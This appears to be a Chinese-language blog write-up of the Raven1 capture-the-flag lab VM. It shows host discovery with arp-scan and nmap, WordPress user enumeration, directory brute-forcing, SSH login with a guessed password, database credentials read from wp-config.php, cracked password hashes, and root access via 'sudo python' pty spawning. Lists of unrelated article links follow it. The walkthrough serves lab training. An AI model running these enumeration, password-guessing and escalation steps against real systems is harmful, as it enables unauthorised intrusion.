Raven1渗透实战

目录:

1.wordpress爆破用户

2.wp-config得到数据库账号密码

3.ssh连接
4.pythn提权(sudo python -c 'import pty;pty.spawn("/bin/bash")')

主机发现与信息收集

arp-scan –l
 
主机发现
nmap -sS -A -p- 192.168.8.127 –n

 
nmap全端口扫

Web渗透实战

可以先修改一下hosts:

192.168.8.127 raven.local

进入web端,浓浓的wordpress风格

http://192.168.8.127/wordpress/

wordpress爆用户

小tips:http://192.168.8.127/wordpress/?author=n (n=1,2,3,4……)
http://192.168.8.127/wordpress/?author=1

出现用户: MICHAEL (michael)

 
wordpress

找到后台 http://raven.local/wordpress/wp-login.php (michael登录失败)

dir爆目录

出现几个可疑的目录:

http://192.168.8.127/vendor

http://192.168.8.127/wordpress/

继续爆这几个关键目录:

 
dir

看到pop3、phpmail和smtp就能想到应该和邮件有关的,应该是入口

 
dir2

在wordpress中罕见 http://192.168.8.127/service.html 并右键查看源代码

Get到第一个flag:

flag1{b9bbcb33e11b80be759c4e844862482d}

 
flag1

继续浏览爆出来的目录

http://192.168.8.127/vendor/PATH 暴露了系统路径,也许之后会用到

/var/www/html/vendor/

 
path

http://192.168.8.127/vendor/VERSION 暴露了版本信息 5.2.16

 
version

发现http://192.168.8.127/vendor/SECURITY.md 有提示

 
提示

从爆出来的这些目录来看,无疑是在提示从phpmailer入手

这时想到了goldeneye中的pop3服务

Nmap扫出来的端口中没有pop3和smtp服务

只能从22端口ssh入手了

ssh登录

尝试登录ssh,用户名就用wordpress暴露的用户 michael,密码尝试用 michael

ssh michael@192.168.8.127

登录成功,果然提示有邮件mail,然而并没有邮件提示

 
ssh

直接全局搜flag

find / -name "*flag*" 2>/dev/null
 
find flag
cat /var/www/flag2.txt
 
flag2

get第二个flag:

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

常规提权

netstat –a

发现主机开启的端口和服务

 
netstat -a

在靶机的3306端口开启了mysql服务

进入wordpress目录,查看conf配置文件,查看数据库密码

vi wp-config.php
 
wp-config
root / R@v3nSecurity

直接登录靶机的数据库

mysql -u root –p
 
mysql

进入wordpress数据中,发现wp_posts表,应该是post数据

select * from wp_posts;

发现了flag3和flag4:

 
flag3-4

flag3{afc01ab56b50591e7dccf93122770cd2}

flag4{715dea6c055b9fe3337544932f2941ce}

查看wordpress数据库中的users表

 
users
michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

md5解看看

 
somd5

steven 的密码为 pink84

michael的解不出来

拿去登录一下ssh试试

ssh steven@192.168.8.127
 
ssh
sudo –l 

显示出当前用户的权限,发现可以运行python,直接python提权

sudo python -c 'import pty;pty.spawn("/bin/bash")'
 
python root

得到第四个flag:

 

Raven1渗透实战的更多相关文章

  1. 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网

    /文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...

  2. 【渗透实战】那些奇葩的WAF_第二期_无意发现通杀漏洞,空字节突破上传!

    /文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334 未经许可,禁止转载/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何 ...

  3. PowerUp攻击渗透实战

    记录下PowerUp在实战渗透中的利用 准备环境: kali linux 攻击机 已获得靶机meterpreter(非管理)权限 win7 靶机  拥有powershell环境 1)Invoke-Al ...

  4. PowerSploit-CodeExecution(代码执行)脚本渗透实战

    首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. 项目地址:https://g ...

  5. Burp Suite渗透实战操作指南-上篇

    Burp必备知识 在介绍功能之前有必要让大家了解一些burp的常用功能,以便在使用中更好的发挥麒麟臂的优势. 1.1  快捷键 很多人可能都没用过burp的快捷键吧,位置如下,不说话,如果不顺手可以自 ...

  6. 【渗透实战】web渗透实战,手动拿学校站点 得到上万人的信息(漏洞已提交)

    ------------恢复内容开始------------ ’‘’版权tanee转发交流学校请备注漏洞已经提交学校管理员关键过程的截图和脚本代码已经略去.希望大家学习技术和思路就好,切勿进行违法犯罪 ...

  7. DC-8靶机渗透实战

    前言: 本文将讲述通过信息收集,再web站点的sql注入漏洞加john爆破登录后台,然后找到远程代码执行漏洞getshell,最后用exim4命令提权漏洞进行权限提升拿到最终的flag. 0x00 环 ...

  8. 【渗透实战】那些年我们遇到的奇葩WAF_第一期_请求方式绕过

    /文章作者:Kali_MG1937 CSDN博客:ALDYS4 QQ:3496925334/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何被顶上博客首页 为了避 ...

  9. 【渗透实战】sqlmap_修改tamper脚本_绕过WAF_第三期

    /文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334/ 今天google找注入点的时候发现某企业一个挺有意思的waf 常规操作绕过去后决定写一篇博客 信息收集 ...

随机推荐

  1. 20V,24V转5V,20V,24V转3.3V降压芯片,IC介绍

    常用的20V和24V转5V,3.3V的LDO稳压和DC-DC降压芯片: PW6206系列是一款高精度,高输入电压,低静态电流,高速,低压降线性稳压器具有高纹波抑制.输入电压高达40V,负载电流高达10 ...

  2. 2.4V升3.3V,2.4V升3V,1A大电流升压芯片

    两节镍氢电池串联就是1.2V+1.2V=2.4V的供电电压了,2.4V升3V, 2.4V升3.3V的话,就能稳压稳定给模块供电了,镍氢电池是会随着使用的电池电量减少的话,电池的电压也是跟着变化的,导致 ...

  3. linux驱动设备号

    一.设备号基础 一般来说,使用ls -l命令在时间一列的前一列的数字表示的是文件大小,但如果该文件表示的是一个设备的话,那时间一列的前一列将有两个数字,用逗号分隔开,如下图: 前一个数字表示主设备号, ...

  4. Vue3 源码之 reactivity

    注: 为了直观的看到 Vue3 的实现逻辑, 本文移除了边缘情况处理.兼容处理.DEV环境的特殊逻辑等, 只保留了核心逻辑 vue-next/reactivity 实现了 Vue3 的响应性, rea ...

  5. Linux内核[CVE-2016-5195] (dirty COW)原理分析

    [原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com https://bbs.pediy.com/ ...

  6. springboot项目-声明式事务失效

    1.项目背景 集成了shiro配置 2. 项目分析 由于ShiroFilterFactoryBean实现了FactoryBean接口,所以它会提前被初始化.又因为SecurityManager,Sec ...

  7. 龙芯fedora28日常生存指南

    2021-01-30 v0.0.5 从0.0.1开始改了非常多,一月余时间的花费渴望为其他人提供一点帮助,能够快速上手. 这主要是这一年来我从3B1500到3A4000再到福珑2的日常使用记录,是之前 ...

  8. EasyUI框架

    使用EasyUI框架时,需要导入3个包在项目js文件夹之中. 在项目之中,每次需先引入相关文件: <!--引入jquery--> <script src="../js/jq ...

  9. Ajax原理,技术封装与完整示例代码

    在做项目和学习的时候,经常用到Ajax的相关技术,但是这方面的技术总是运用的不是十分好,就寻找相关博客来学习加深Ajax技术相关. 一.Ajax简介 二.同步.异步传输区别 2.1 异步传输 2.2 ...

  10. java架构《并发线程基础一》

    1.实现线程常见的两种的方式 : 1:继承extends Thread 2:实现new Runnable 实现其run方法 2.线程安全    结论: 当多个线程访问某一个类(对象或方法)时,这个对象 ...